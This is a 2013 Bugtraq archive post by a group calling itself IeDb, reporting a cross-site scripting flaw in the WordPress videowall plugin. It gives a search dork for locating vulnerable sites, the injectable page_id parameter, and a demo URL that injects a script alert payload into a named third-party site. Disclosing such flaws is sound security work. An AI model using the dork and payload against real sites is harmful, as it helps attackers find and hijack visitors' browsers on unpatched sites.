Bugtraq mailing list archives

Wordpress videowall Plugin Xss vulnerabilities

From: iedb.team () gmail com
Date: Sat, 19 Oct 2013 07:27:26 GMT

The Wordpress videowall Plugin suffers from a Cross-Site Scripting Vulnerability


#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################

# Exploit Title : Wordpress videowall Plugin Xss vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team () Gmail com

# Home : http://iedb.ir   -   http://iedb.ir/acc

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/wp-content/plugins/videowall/

#################################

# Exploit :

# http://site.com/wp-content/plugins/videowall/index.php?page_id=[Xss]

# Dem0 :

# http://neroqom.com/wp-content/plugins/videowall/index.php?page_id=8";><script>alert(/IeDb.Ir/)</script>

#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-716.html

#################################

Current thread:

Wordpress videowall Plugin Xss vulnerabilities iedb . team (Oct 20)